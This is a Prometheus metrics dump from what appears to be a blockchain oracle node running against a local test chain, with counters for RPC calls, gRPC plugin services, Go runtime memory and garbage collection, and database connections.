# TYPE automation_log_trigger_log_provider_latest_block gauge
automation_log_trigger_log_provider_latest_block 0
# HELP automation_log_trigger_num_active_upkeeps How many log trigger upkeeps are currently active
# TYPE automation_log_trigger_num_active_upkeeps gauge
automation_log_trigger_num_active_upkeeps 0
# HELP automation_log_trigger_num_recoverer_missed_logs How many valid log triggers were identified as being missed by the recoverer
# TYPE automation_log_trigger_num_recoverer_missed_logs counter
automation_log_trigger_num_recoverer_missed_logs 0
# HELP automation_log_trigger_num_recoverer_pending_payloads How many log trigger payloads are currently pending in the recoverer
# TYPE automation_log_trigger_num_recoverer_pending_payloads gauge
automation_log_trigger_num_recoverer_pending_payloads 0
# HELP db_conns_max Maximum number of open connections to the database.
# TYPE db_conns_max gauge
db_conns_max 100
# HELP db_conns_open The number of established connections both in use and idle.
# TYPE db_conns_open gauge
db_conns_open 2
# HELP db_conns_used The number of connections currently in use.
# TYPE db_conns_used gauge
db_conns_used 0
# HELP db_wait_count The total number of connections waited for.
# TYPE db_wait_count gauge
db_wait_count 0
# HELP db_wait_time_seconds The total time blocked waiting for a new connection.
# TYPE db_wait_time_seconds gauge
db_wait_time_seconds 0
# HELP evm_pool_rpc_node_calls_failed The approximate total number of failed RPC calls for the given RPC node
# TYPE evm_pool_rpc_node_calls_failed counter
evm_pool_rpc_node_calls_failed{evmChainID="1337",nodeName="anvil"} 12
# HELP evm_pool_rpc_node_calls_success The approximate total number of successful RPC calls for the given RPC node
# TYPE evm_pool_rpc_node_calls_success counter
evm_pool_rpc_node_calls_success{evmChainID="1337",nodeName="anvil"} 3
# HELP evm_pool_rpc_node_calls_total The approximate total number of RPC calls for the given RPC node
# TYPE evm_pool_rpc_node_calls_total counter
evm_pool_rpc_node_calls_total{evmChainID="1337",nodeName="anvil"} 15
# HELP evm_pool_rpc_node_dials_success The total number of successful dials for the given RPC node
# TYPE evm_pool_rpc_node_dials_success counter
evm_pool_rpc_node_dials_success{evmChainID="1337",nodeName="anvil"} 4
# HELP evm_pool_rpc_node_dials_total The total number of dials for the given RPC node
# TYPE evm_pool_rpc_node_dials_total counter
evm_pool_rpc_node_dials_total{evmChainID="1337",nodeName="anvil"} 4
# HELP evm_pool_rpc_node_rpc_call_time The duration of an RPC call in nanoseconds
# TYPE evm_pool_rpc_node_rpc_call_time histogram
evm_pool_rpc_node_rpc_call_time_bucket{evmChainID="1337",isSendOnly="false",nodeName="anvil",rpcCallName="CallContext",rpcHost="rpcshim:8545",success="false",le="5e+07"} 12
evm_pool_rpc_node_rpc_call_time_bucket{evmChainID="1337",isSendOnly="false",nodeName="anvil",rpcCallName="CallContext",rpcHost="rpcshim:8545",success="false",le="1e+08"} 12
evm_pool_rpc_node_rpc_call_time_bucket{evmChainID="1337",isSendOnly="false",nodeName="anvil",rpcCallName="CallContext",rpcHost="rpcshim:8545",success="false",le="2e+08"} 12
evm_pool_rpc_node_rpc_call_time_bucket{evmChainID="1337",isSendOnly="false",nodeName="anvil",rpcCallName="CallContext",rpcHost="rpcshim:8545",success="false",le="5e+08"} 12
evm_pool_rpc_node_rpc_call_time_bucket{evmChainID="1337",isSendOnly="false",nodeName="anvil",rpcCallName="CallContext",rpcHost="rpcshim:8545",success="false",le="1e+09"} 12
evm_pool_rpc_node_rpc_call_time_bucket{evmChainID="1337",isSendOnly="false",nodeName="anvil",rpcCallName="CallContext",rpcHost="rpcshim:8545",success="false",le="2e+09"} 12
evm_pool_rpc_node_rpc_call_time_bucket{evmChainID="1337",isSendOnly="false",nodeName="anvil",rpcCallName="CallContext",rpcHost="rpcshim:8545",success="false",le="4e+09"} 12
evm_pool_rpc_node_rpc_call_time_bucket{evmChainID="1337",isSendOnly="false",nodeName="anvil",rpcCallName="CallContext",rpcHost="rpcshim:8545",success="false",le="8e+09"} 12
evm_pool_rpc_node_rpc_call_time_bucket{evmChainID="1337",isSendOnly="false",nodeName="anvil",rpcCallName="CallContext",rpcHost="rpcshim:8545",success="false",le="+Inf"} 12
evm_pool_rpc_node_rpc_call_time_sum{evmChainID="1337",isSendOnly="false",nodeName="anvil",rpcCallName="CallContext",rpcHost="rpcshim:8545",success="false"} 7.914278e+07
evm_pool_rpc_node_rpc_call_time_count{evmChainID="1337",isSendOnly="false",nodeName="anvil",rpcCallName="CallContext",rpcHost="rpcshim:8545",success="false"} 12
evm_pool_rpc_node_rpc_call_time_bucket{evmChainID="1337",isSendOnly="false",nodeName="anvil",rpcCallName="CallContext",rpcHost="rpcshim:8545",success="true",le="5e+07"} 3
evm_pool_rpc_node_rpc_call_time_bucket{evmChainID="1337",isSendOnly="false",nodeName="anvil",rpcCallName="CallContext",rpcHost="rpcshim:8545",success="true",le="1e+08"} 3
evm_pool_rpc_node_rpc_call_time_bucket{evmChainID="1337",isSendOnly="false",nodeName="anvil",rpcCallName="CallContext",rpcHost="rpcshim:8545",success="true",le="2e+08"} 3
evm_pool_rpc_node_rpc_call_time_bucket{evmChainID="1337",isSendOnly="false",nodeName="anvil",rpcCallName="CallContext",rpcHost="rpcshim:8545",success="true",le="5e+08"} 3
evm_pool_rpc_node_rpc_call_time_bucket{evmChainID="1337",isSendOnly="false",nodeName="anvil",rpcCallName="CallContext",rpcHost="rpcshim:8545",success="true",le="1e+09"} 3
evm_pool_rpc_node_rpc_call_time_bucket{evmChainID="1337",isSendOnly="false",nodeName="anvil",rpcCallName="CallContext",rpcHost="rpcshim:8545",success="true",le="2e+09"} 3
evm_pool_rpc_node_rpc_call_time_bucket{evmChainID="1337",isSendOnly="false",nodeName="anvil",rpcCallName="CallContext",rpcHost="rpcshim:8545",success="true",le="4e+09"} 3
evm_pool_rpc_node_rpc_call_time_bucket{evmChainID="1337",isSendOnly="false",nodeName="anvil",rpcCallName="CallContext",rpcHost="rpcshim:8545",success="true",le="8e+09"} 3
evm_pool_rpc_node_rpc_call_time_bucket{evmChainID="1337",isSendOnly="false",nodeName="anvil",rpcCallName="CallContext",rpcHost="rpcshim:8545",success="true",le="+Inf"} 3
evm_pool_rpc_node_rpc_call_time_sum{evmChainID="1337",isSendOnly="false",nodeName="anvil",rpcCallName="CallContext",rpcHost="rpcshim:8545",success="true"} 1.4527003e+07
evm_pool_rpc_node_rpc_call_time_count{evmChainID="1337",isSendOnly="false",nodeName="anvil",rpcCallName="CallContext",rpcHost="rpcshim:8545",success="true"} 3
# HELP go_gc_duration_seconds A summary of the wall-time pause (stop-the-world) duration in garbage collection cycles.
# TYPE go_gc_duration_seconds summary
go_gc_duration_seconds{quantile="0"} 0.000117645
go_gc_duration_seconds{quantile="0.25"} 0.000221173
go_gc_duration_seconds{quantile="0.5"} 0.000405061
go_gc_duration_seconds{quantile="0.75"} 0.000447379
go_gc_duration_seconds{quantile="1"} 0.004499606
go_gc_duration_seconds_sum 0.006025391
go_gc_duration_seconds_count 6
# HELP go_gc_gogc_percent Heap size target percentage configured by the user, otherwise 100. This value is set by the GOGC environment variable, and the runtime/debug.SetGCPercent function. Sourced from /gc/gogc:percent.
# TYPE go_gc_gogc_percent gauge
go_gc_gogc_percent 100
# HELP go_gc_gomemlimit_bytes Go runtime memory limit configured by the user, otherwise math.MaxInt64. This value is set by the GOMEMLIMIT environment variable, and the runtime/debug.SetMemoryLimit function. Sourced from /gc/gomemlimit:bytes.
# TYPE go_gc_gomemlimit_bytes gauge
go_gc_gomemlimit_bytes 9.223372036854776e+18
# HELP go_goroutines Number of goroutines that currently exist.
# TYPE go_goroutines gauge
go_goroutines 81
# HELP go_info Information about the Go environment.
# TYPE go_info gauge
go_info{version="go1.26.5"} 1
# HELP go_memstats_alloc_bytes Number of bytes allocated in heap and currently in use. Equals to /memory/classes/heap/objects:bytes.
# TYPE go_memstats_alloc_bytes gauge
go_memstats_alloc_bytes 8.987816e+06
# HELP go_memstats_alloc_bytes_total Total number of bytes allocated in heap until now, even if released already. Equals to /gc/heap/allocs:bytes.
# TYPE go_memstats_alloc_bytes_total counter
go_memstats_alloc_bytes_total 1.8637736e+07
# HELP go_memstats_buck_hash_sys_bytes Number of bytes used by the profiling bucket hash table. Equals to /memory/classes/profiling/buckets:bytes.
# TYPE go_memstats_buck_hash_sys_bytes gauge
go_memstats_buck_hash_sys_bytes 1.463825e+06
# HELP go_memstats_frees_total Total number of heap objects frees. Equals to /gc/heap/frees:objects + /gc/heap/tiny/allocs:objects.
# TYPE go_memstats_frees_total counter
go_memstats_frees_total 96166
# HELP go_memstats_gc_sys_bytes Number of bytes used for garbage collection system metadata. Equals to /memory/classes/metadata/other:bytes.
# TYPE go_memstats_gc_sys_bytes gauge
go_memstats_gc_sys_bytes 4.004592e+06
# HELP go_memstats_heap_alloc_bytes Number of heap bytes allocated and currently in use, same as go_memstats_alloc_bytes. Equals to /memory/classes/heap/objects:bytes.
# TYPE go_memstats_heap_alloc_bytes gauge
go_memstats_heap_alloc_bytes 8.987816e+06
# HELP go_memstats_heap_idle_bytes Number of heap bytes waiting to be used. Equals to /memory/classes/heap/released:bytes + /memory/classes/heap/free:bytes.
# TYPE go_memstats_heap_idle_bytes gauge
go_memstats_heap_idle_bytes 5.881856e+06
# HELP go_memstats_heap_inuse_bytes Number of heap bytes that are in use. Equals to /memory/classes/heap/objects:bytes + /memory/classes/heap/unused:bytes
# TYPE go_memstats_heap_inuse_bytes gauge
go_memstats_heap_inuse_bytes 1.3877248e+07
# HELP go_memstats_heap_objects Number of currently allocated objects. Equals to /gc/heap/objects:objects.
# TYPE go_memstats_heap_objects gauge
go_memstats_heap_objects 36428
# HELP go_memstats_heap_released_bytes Number of heap bytes released to OS. Equals to /memory/classes/heap/released:bytes.
# TYPE go_memstats_heap_released_bytes gauge
go_memstats_heap_released_bytes 3.8912e+06
# HELP go_memstats_heap_sys_bytes Number of heap bytes obtained from system. Equals to /memory/classes/heap/objects:bytes + /memory/classes/heap/unused:bytes + /memory/classes/heap/released:bytes + /memory/classes/heap/free:bytes.
# TYPE go_memstats_heap_sys_bytes gauge
go_memstats_heap_sys_bytes 1.9759104e+07
# HELP go_memstats_last_gc_time_seconds Number of seconds since 1970 of last garbage collection.
# TYPE go_memstats_last_gc_time_seconds gauge
go_memstats_last_gc_time_seconds 1.7866042447399292e+09
# HELP go_memstats_mallocs_total Total number of heap objects allocated, both live and gc-ed. Semantically a counter version for go_memstats_heap_objects gauge. Equals to /gc/heap/allocs:objects + /gc/heap/tiny/allocs:objects.
# TYPE go_memstats_mallocs_total counter
go_memstats_mallocs_total 132594
# HELP go_memstats_mcache_inuse_bytes Number of bytes in use by mcache structures. Equals to /memory/classes/metadata/mcache/inuse:bytes.
# TYPE go_memstats_mcache_inuse_bytes gauge
go_memstats_mcache_inuse_bytes 18368
# HELP go_memstats_mcache_sys_bytes Number of bytes used for mcache structures obtained from system. Equals to /memory/classes/metadata/mcache/inuse:bytes + /memory/classes/metadata/mcache/free:bytes.
# TYPE go_memstats_mcache_sys_bytes gauge
go_memstats_mcache_sys_bytes 32144
# HELP go_memstats_mspan_inuse_bytes Number of bytes in use by mspan structures. Equals to /memory/classes/metadata/mspan/inuse:bytes.
# TYPE go_memstats_mspan_inuse_bytes gauge
go_memstats_mspan_inuse_bytes 255040
# HELP go_memstats_mspan_sys_bytes Number of bytes used for mspan structures obtained from system. Equals to /memory/classes/metadata/mspan/inuse:bytes + /memory/classes/metadata/mspan/free:bytes.
# TYPE go_memstats_mspan_sys_bytes gauge
go_memstats_mspan_sys_bytes 261120
# HELP go_memstats_next_gc_bytes Number of heap bytes when next garbage collection will take place. Equals to /gc/heap/goal:bytes.
# TYPE go_memstats_next_gc_bytes gauge
go_memstats_next_gc_bytes 1.8448138e+07
# HELP go_memstats_other_sys_bytes Number of bytes used for other system allocations. Equals to /memory/classes/other:bytes.
# TYPE go_memstats_other_sys_bytes gauge
go_memstats_other_sys_bytes 1.724023e+06
# HELP go_memstats_stack_inuse_bytes Number of bytes obtained from system for stack allocator in non-CGO environments. Equals to /memory/classes/heap/stacks:bytes.
# TYPE go_memstats_stack_inuse_bytes gauge
go_memstats_stack_inuse_bytes 1.212416e+06
# HELP go_memstats_stack_sys_bytes Number of bytes obtained from system for stack allocator. Equals to /memory/classes/heap/stacks:bytes + /memory/classes/os-stacks:bytes.
# TYPE go_memstats_stack_sys_bytes gauge
go_memstats_stack_sys_bytes 1.212416e+06
# HELP go_memstats_sys_bytes Number of bytes obtained from system. Equals to /memory/classes/total:byte.
# TYPE go_memstats_sys_bytes gauge
go_memstats_sys_bytes 2.8457224e+07
# HELP go_sched_gomaxprocs_threads The current runtime.GOMAXPROCS setting, or the number of operating system threads that can execute user-level Go code simultaneously. Sourced from /sched/gomaxprocs:threads.
# TYPE go_sched_gomaxprocs_threads gauge
go_sched_gomaxprocs_threads 8
# HELP go_threads Number of OS threads created.
# TYPE go_threads gauge
go_threads 14
# HELP grpc_client_handled_total Total number of RPCs completed by the client, regardless of success or failure.
# TYPE grpc_client_handled_total counter
grpc_client_handled_total{grpc_code="OK",grpc_method="Accounts",grpc_service="loop.Keystore",grpc_type="unary"} 6
# HELP grpc_client_handling_seconds Histogram of response latency (seconds) of the gRPC until it is finished by the application.
# TYPE grpc_client_handling_seconds histogram
grpc_client_handling_seconds_bucket{grpc_method="Accounts",grpc_service="loop.Keystore",grpc_type="unary",le="0.001"} 2
grpc_client_handling_seconds_bucket{grpc_method="Accounts",grpc_service="loop.Keystore",grpc_type="unary",le="0.01"} 6
grpc_client_handling_seconds_bucket{grpc_method="Accounts",grpc_service="loop.Keystore",grpc_type="unary",le="0.1"} 6
grpc_client_handling_seconds_bucket{grpc_method="Accounts",grpc_service="loop.Keystore",grpc_type="unary",le="0.3"} 6
grpc_client_handling_seconds_bucket{grpc_method="Accounts",grpc_service="loop.Keystore",grpc_type="unary",le="0.6"} 6
grpc_client_handling_seconds_bucket{grpc_method="Accounts",grpc_service="loop.Keystore",grpc_type="unary",le="1"} 6
grpc_client_handling_seconds_bucket{grpc_method="Accounts",grpc_service="loop.Keystore",grpc_type="unary",le="3"} 6
grpc_client_handling_seconds_bucket{grpc_method="Accounts",grpc_service="loop.Keystore",grpc_type="unary",le="6"} 6
grpc_client_handling_seconds_bucket{grpc_method="Accounts",grpc_service="loop.Keystore",grpc_type="unary",le="9"} 6
grpc_client_handling_seconds_bucket{grpc_method="Accounts",grpc_service="loop.Keystore",grpc_type="unary",le="20"} 6
grpc_client_handling_seconds_bucket{grpc_method="Accounts",grpc_service="loop.Keystore",grpc_type="unary",le="30"} 6
grpc_client_handling_seconds_bucket{grpc_method="Accounts",grpc_service="loop.Keystore",grpc_type="unary",le="60"} 6
grpc_client_handling_seconds_bucket{grpc_method="Accounts",grpc_service="loop.Keystore",grpc_type="unary",le="90"} 6
grpc_client_handling_seconds_bucket{grpc_method="Accounts",grpc_service="loop.Keystore",grpc_type="unary",le="120"} 6
grpc_client_handling_seconds_bucket{grpc_method="Accounts",grpc_service="loop.Keystore",grpc_type="unary",le="+Inf"} 6
grpc_client_handling_seconds_sum{grpc_method="Accounts",grpc_service="loop.Keystore",grpc_type="unary"} 0.013644732
grpc_client_handling_seconds_count{grpc_method="Accounts",grpc_service="loop.Keystore",grpc_type="unary"} 6
# HELP grpc_client_msg_received_total Total number of RPC stream messages received by the client.
# TYPE grpc_client_msg_received_total counter
grpc_client_msg_received_total{grpc_method="Accounts",grpc_service="loop.Keystore",grpc_type="unary"} 6
# HELP grpc_client_msg_sent_total Total number of gRPC stream messages sent by the client.
# TYPE grpc_client_msg_sent_total counter
grpc_client_msg_sent_total{grpc_method="Accounts",grpc_service="loop.Keystore",grpc_type="unary"} 6
# HELP grpc_client_started_total Total number of RPCs started on the client.
# TYPE grpc_client_started_total counter
grpc_client_started_total{grpc_method="Accounts",grpc_service="loop.Keystore",grpc_type="unary"} 6
# HELP grpc_server_handled_total Total number of RPCs completed on the server, regardless of success or failure.
# TYPE grpc_server_handled_total counter
grpc_server_handled_total{grpc_code="OK",grpc_method="Check",grpc_service="grpc.health.v1.Health",grpc_type="unary"} 22
grpc_server_handled_total{grpc_code="OK",grpc_method="HealthReport",grpc_service="loop.Service",grpc_type="unary"} 8
grpc_server_handled_total{grpc_code="OK",grpc_method="NewRelayer",grpc_service="loop.PluginRelayer",grpc_type="unary"} 1
grpc_server_handled_total{grpc_code="OK",grpc_method="Ready",grpc_service="loop.Service",grpc_type="unary"} 15
grpc_server_handled_total{grpc_code="Unknown",grpc_method="LatestHead",grpc_service="loop.Relayer",grpc_type="unary"} 14
# HELP grpc_server_handling_seconds Histogram of response latency (seconds) of gRPC that had been application-level handled by the server.
# TYPE grpc_server_handling_seconds histogram
grpc_server_handling_seconds_bucket{grpc_method="Check",grpc_service="grpc.health.v1.Health",grpc_type="unary",le="0.001"} 22
grpc_server_handling_seconds_bucket{grpc_method="Check",grpc_service="grpc.health.v1.Health",grpc_type="unary",le="0.01"} 22
grpc_server_handling_seconds_bucket{grpc_method="Check",grpc_service="grpc.health.v1.Health",grpc_type="unary",le="0.1"} 22
grpc_server_handling_seconds_bucket{grpc_method="Check",grpc_service="grpc.health.v1.Health",grpc_type="unary",le="0.3"} 22
grpc_server_handling_seconds_bucket{grpc_method="Check",grpc_service="grpc.health.v1.Health",grpc_type="unary",le="0.6"} 22
grpc_server_handling_seconds_bucket{grpc_method="Check",grpc_service="grpc.health.v1.Health",grpc_type="unary",le="1"} 22
grpc_server_handling_seconds_bucket{grpc_method="Check",grpc_service="grpc.health.v1.Health",grpc_type="unary",le="3"} 22
grpc_server_handling_seconds_bucket{grpc_method="Check",grpc_service="grpc.health.v1.Health",grpc_type="unary",le="6"} 22
grpc_server_handling_seconds_bucket{grpc_method="Check",grpc_service="grpc.health.v1.Health",grpc_type="unary",le="9"} 22
grpc_server_handling_seconds_bucket{grpc_method="Check",grpc_service="grpc.health.v1.Health",grpc_type="unary",le="20"} 22
grpc_server_handling_seconds_bucket{grpc_method="Check",grpc_service="grpc.health.v1.Health",grpc_type="unary",le="30"} 22
grpc_server_handling_seconds_bucket{grpc_method="Check",grpc_service="grpc.health.v1.Health",grpc_type="unary",le="60"} 22
grpc_server_handling_seconds_bucket{grpc_method="Check",grpc_service="grpc.health.v1.Health",grpc_type="unary",le="90"} 22
grpc_server_handling_seconds_bucket{grpc_method="Check",grpc_service="grpc.health.v1.Health",grpc_type="unary",le="120"} 22
grpc_server_handling_seconds_bucket{grpc_method="Check",grpc_service="grpc.health.v1.Health",grpc_type="unary",le="+Inf"} 22
grpc_server_handling_seconds_sum{grpc_method="Check",grpc_service="grpc.health.v1.Health",grpc_type="unary"} 0.0005591770000000001
grpc_server_handling_seconds_count{grpc_method="Check",grpc_service="grpc.health.v1.Health",grpc_type="unary"} 22
grpc_server_handling_seconds_bucket{grpc_method="HealthReport",grpc_service="loop.Service",grpc_type="unary",le="0.001"} 8
grpc_server_handling_seconds_bucket{grpc_method="HealthReport",grpc_service="loop.Service",grpc_type="unary",le="0.01"} 8
grpc_server_handling_seconds_bucket{grpc_method="HealthReport",grpc_service="loop.Service",grpc_type="unary",le="0.1"} 8
grpc_server_handling_seconds_bucket{grpc_method="HealthReport",grpc_service="loop.Service",grpc_type="unary",le="0.3"} 8
grpc_server_handling_seconds_bucket{grpc_method="HealthReport",grpc_service="loop.Service",grpc_type="unary",le="0.6"} 8
grpc_server_handling_seconds_bucket{grpc_method="HealthReport",grpc_service="loop.Service",grpc_type="unary",le="1"} 8
grpc_server_handling_seconds_bucket{grpc_method="HealthReport",grpc_service="loop.Service",grpc_type="unary",le="3"} 8
grpc_server_handling_seconds_bucket{grpc_method="HealthReport",grpc_service="loop.Service",grpc_type="unary",le="6"} 8
grpc_server_handling_seconds_bucket{grpc_method="HealthReport",grpc_service="loop.Service",grpc_type="unary",le="9"} 8
grpc_server_handling_seconds_bucket{grpc_method="HealthReport",grpc_service="loop.Service",grpc_type="unary",le="20"} 8
grpc_server_handling_seconds_bucket{grpc_method="HealthReport",grpc_service="loop.Service",grpc_type="unary",le="30"} 8
grpc_server_handling_seconds_bucket{grpc_method="HealthReport",grpc_service="loop.Service",grpc_type="unary",le="60"} 8
grpc_server_handling_seconds_bucket{grpc_method="HealthReport",grpc_service="loop.Service",grpc_type="unary",le="90"} 8
grpc_server_handling_seconds_bucket{grpc_method="HealthReport",grpc_service="loop.Service",grpc_type="unary",le="120"} 8
grpc_server_handling_seconds_bucket{grpc_method="HealthReport",grpc_service="loop.Service",grpc_type="unary",le="+Inf"} 8
grpc_server_handling_seconds_sum{grpc_method="HealthReport",grpc_service="loop.Service",grpc_type="unary"} 0.001235499
grpc_server_handling_seconds_count{grpc_method="HealthReport",grpc_service="loop.Service",grpc_type="unary"} 8
grpc_server_handling_seconds_bucket{grpc_method="LatestHead",grpc_service="loop.Relayer",grpc_type="unary",le="0.001"} 14
grpc_server_handling_seconds_bucket{grpc_method="LatestHead",grpc_service="loop.Relayer",grpc_type="unary",le="0.01"} 14
grpc_server_handling_seconds_bucket{grpc_method="LatestHead",grpc_service="loop.Relayer",grpc_type="unary",le="0.1"} 14
grpc_server_handling_seconds_bucket{grpc_method="LatestHead",grpc_service="loop.Relayer",grpc_type="unary",le="0.3"} 14
grpc_server_handling_seconds_bucket{grpc_method="LatestHead",grpc_service="loop.Relayer",grpc_type="unary",le="0.6"} 14
grpc_server_handling_seconds_bucket{grpc_method="LatestHead",grpc_service="loop.Relayer",grpc_type="unary",le="1"} 14
grpc_server_handling_seconds_bucket{grpc_method="LatestHead",grpc_service="loop.Relayer",grpc_type="unary",le="3"} 14
grpc_server_handling_seconds_bucket{grpc_method="LatestHead",grpc_service="loop.Relayer",grpc_type="unary",le="6"} 14
grpc_server_handling_seconds_bucket{grpc_method="LatestHead",grpc_service="loop.Relayer",grpc_type="unary",le="9"} 14
grpc_server_handling_seconds_bucket{grpc_method="LatestHead",grpc_service="loop.Relayer",grpc_type="unary",le="20"} 14
grpc_server_handling_seconds_bucket{grpc_method="LatestHead",grpc_service="loop.Relayer",grpc_type="unary",le="30"} 14
grpc_server_handling_seconds_bucket{grpc_method="LatestHead",grpc_service="loop.Relayer",grpc_type="unary",le="60"} 14
grpc_server_handling_seconds_bucket{grpc_method="LatestHead",grpc_service="loop.Relayer",grpc_type="unary",le="90"} 14
grpc_server_handling_seconds_bucket{grpc_method="LatestHead",grpc_service="loop.Relayer",grpc_type="unary",le="120"} 14
grpc_server_handling_seconds_bucket{grpc_method="LatestHead",grpc_service="loop.Relayer",grpc_type="unary",le="+Inf"} 14
grpc_server_handling_seconds_sum{grpc_method="LatestHead",grpc_service="loop.Relayer",grpc_type="unary"} 0.0008198340000000002
grpc_server_handling_seconds_count{grpc_method="LatestHead",grpc_service="loop.Relayer",grpc_type="unary"} 14
grpc_server_handling_seconds_bucket{grpc_method="NewRelayer",grpc_service="loop.PluginRelayer",grpc_type="unary",le="0.001"} 0
grpc_server_handling_seconds_bucket{grpc_method="NewRelayer",grpc_service="loop.PluginRelayer",grpc_type="unary",le="0.01"} 0
grpc_server_handling_seconds_bucket{grpc_method="NewRelayer",grpc_service="loop.PluginRelayer",grpc_type="unary",le="0.1"} 0
grpc_server_handling_seconds_bucket{grpc_method="NewRelayer",grpc_service="loop.PluginRelayer",grpc_type="unary",le="0.3"} 1
grpc_server_handling_seconds_bucket{grpc_method="NewRelayer",grpc_service="loop.PluginRelayer",grpc_type="unary",le="0.6"} 1
grpc_server_handling_seconds_bucket{grpc_method="NewRelayer",grpc_service="loop.PluginRelayer",grpc_type="unary",le="1"} 1
grpc_server_handling_seconds_bucket{grpc_method="NewRelayer",grpc_service="loop.PluginRelayer",grpc_type="unary",le="3"} 1
grpc_server_handling_seconds_bucket{grpc_method="NewRelayer",grpc_service="loop.PluginRelayer",grpc_type="unary",le="6"} 1
grpc_server_handling_seconds_bucket{grpc_method="NewRelayer",grpc_service="loop.PluginRelayer",grpc_type="unary",le="9"} 1
grpc_server_handling_seconds_bucket{grpc_method="NewRelayer",grpc_service="loop.PluginRelayer",grpc_type="unary",le="20"} 1
grpc_server_handling_seconds_bucket{grpc_method="NewRelayer",grpc_service="loop.PluginRelayer",grpc_type="unary",le="30"} 1
grpc_server_handling_seconds_bucket{grpc_method="NewRelayer",grpc_service="loop.PluginRelayer",grpc_type="unary",le="60"} 1
grpc_server_handling_seconds_bucket{grpc_method="NewRelayer",grpc_service="loop.PluginRelayer",grpc_type="unary",le="90"} 1
grpc_server_handling_seconds_bucket{grpc_method="NewRelayer",grpc_service="loop.PluginRelayer",grpc_type="unary",le="120"} 1
grpc_server_handling_seconds_bucket{grpc_method="NewRelayer",grpc_service="loop.PluginRelayer",grpc_type="unary",le="+Inf"} 1
grpc_server_handling_seconds_sum{grpc_method="NewRelayer",grpc_service="loop.PluginRelayer",grpc_type="unary"} 0.130562875
grpc_server_handling_seconds_count{grpc_method="NewRelayer",grpc_service="loop.PluginRelayer",grpc_type="unary"} 1
grpc_server_handling_seconds_bucket{grpc_method="Ready",grpc_service="loop.Service",grpc_type="unary",le="0.001"} 15
grpc_server_handling_seconds_bucket{grpc_method="Ready",grpc_service="loop.Service",grpc_type="unary",le="0.01"} 15
grpc_server_handling_seconds_bucket{grpc_method="Ready",grpc_service="loop.Service",grpc_type="unary",le="0.1"} 15
grpc_server_handling_seconds_bucket{grpc_method="Ready",grpc_service="loop.Service",grpc_type="unary",le="0.3"} 15
grpc_server_handling_seconds_bucket{grpc_method="Ready",grpc_service="loop.Service",grpc_type="unary",le="0.6"} 15
grpc_server_handling_seconds_bucket{grpc_method="Ready",grpc_service="loop.Service",grpc_type="unary",le="1"} 15
grpc_server_handling_seconds_bucket{grpc_method="Ready",grpc_service="loop.Service",grpc_type="unary",le="3"} 15
grpc_server_handling_seconds_bucket{grpc_method="Ready",grpc_service="loop.Service",grpc_type="unary",le="6"} 15
grpc_server_handling_seconds_bucket{grpc_method="Ready",grpc_service="loop.Service",grpc_type="unary",le="9"} 15
grpc_server_handling_seconds_bucket{grpc_method="Ready",grpc_service="loop.Service",grpc_type="unary",le="20"} 15
grpc_server_handling_seconds_bucket{grpc_method="Ready",grpc_service="loop.Service",grpc_type="unary",le="30"} 15
grpc_server_handling_seconds_bucket{grpc_method="Ready",grpc_service="loop.Service",grpc_type="unary",le="60"} 15
grpc_server_handling_seconds_bucket{grpc_method="Ready",grpc_service="loop.Service",grpc_type="unary",le="90"} 15
grpc_server_handling_seconds_bucket{grpc_method="Ready",grpc_service="loop.Service",grpc_type="unary",le="120"} 15
grpc_server_handling_seconds_bucket{grpc_method="Ready",grpc_service="loop.Service",grpc_type="unary",le="+Inf"} 15
grpc_server_handling_seconds_sum{grpc_method="Ready",grpc_service="loop.Service",grpc_type="unary"} 0.0008292530000000001
grpc_server_handling_seconds_count{grpc_method="Ready",grpc_service="loop.Service",grpc_type="unary"} 15
# HELP grpc_server_msg_received_total Total number of RPC stream messages received on the server.
# TYPE grpc_server_msg_received_total counter
grpc_server_msg_received_total{grpc_method="Check",grpc_service="grpc.health.v1.Health",grpc_type="unary"} 22
grpc_server_msg_received_total{grpc_method="HealthReport",grpc_service="loop.Service",grpc_type="unary"} 8
grpc_server_msg_received_total{grpc_method="LatestHead",grpc_service="loop.Relayer",grpc_type="unary"} 14
grpc_server_msg_received_total{grpc_method="NewRelayer",grpc_service="loop.PluginRelayer",grpc_type="unary"} 1
grpc_server_msg_received_total{grpc_method="Ready",grpc_service="loop.Service",grpc_type="unary"} 15
grpc_server_msg_received_total{grpc_method="StartStream",grpc_service="plugin.GRPCBroker",grpc_type="bidi_stream"} 3
grpc_server_msg_received_total{grpc_method="StreamStdio",grpc_service="plugin.GRPCStdio",grpc_type="server_stream"} 1
# HELP grpc_server_msg_sent_total Total number of gRPC stream messages sent by the server.
# TYPE grpc_server_msg_sent_total counter
grpc_server_msg_sent_total{grpc_method="Check",grpc_service="grpc.health.v1.Health",grpc_type="unary"} 22
grpc_server_msg_sent_total{grpc_method="HealthReport",grpc_service="loop.Service",grpc_type="unary"} 8
grpc_server_msg_sent_total{grpc_method="LatestHead",grpc_service="loop.Relayer",grpc_type="unary"} 14
grpc_server_msg_sent_total{grpc_method="NewRelayer",grpc_service="loop.PluginRelayer",grpc_type="unary"} 1
grpc_server_msg_sent_total{grpc_method="Ready",grpc_service="loop.Service",grpc_type="unary"} 15
grpc_server_msg_sent_total{grpc_method="StartStream",grpc_service="plugin.GRPCBroker",grpc_type="bidi_stream"} 1
# HELP grpc_server_started_total Total number of RPCs started on the server.
# TYPE grpc_server_started_total counter
grpc_server_started_total{grpc_method="Check",grpc_service="grpc.health.v1.Health",grpc_type="unary"} 22
grpc_server_started_total{grpc_method="HealthReport",grpc_service="loop.Service",grpc_type="unary"} 8
grpc_server_started_total{grpc_method="LatestHead",grpc_service="loop.Relayer",grpc_type="unary"} 14
grpc_server_started_total{grpc_method="NewRelayer",grpc_service="loop.PluginRelayer",grpc_type="unary"} 1
grpc_server_started_total{grpc_method="Ready",grpc_service="loop.Service",grpc_type="unary"} 15
grpc_server_started_total{grpc_method="StartStream",grpc_service="plugin.GRPCBroker",grpc_type="bidi_stream"} 1
grpc_server_started_total{grpc_method="StreamStdio",grpc_service="plugin.GRPCStdio",grpc_type="server_stream"} 1
# HELP head_tracker_connection_errors The total number of node connection errors
# TYPE head_tracker_connection_errors counter
head_tracker_connection_errors{ChainID="1337"} 10
# HELP health Health status by service
# TYPE health gauge
health{service_id="PluginEVM"} 1
# HELP llo_dummytransmitter_transmit_success_count Running count of successful transmits
# TYPE llo_dummytransmitter_transmit_success_count counter
llo_dummytransmitter_transmit_success_count 0
# HELP mailbox_load_percent Percent of mailbox capacity used
# TYPE mailbox_load_percent gauge
mailbox_load_percent{appID="096827f4-86e5-427d-abdd-7ee859d5b7a8",capacity="10",name="HeadTracker.Broadcast.1337"} 0
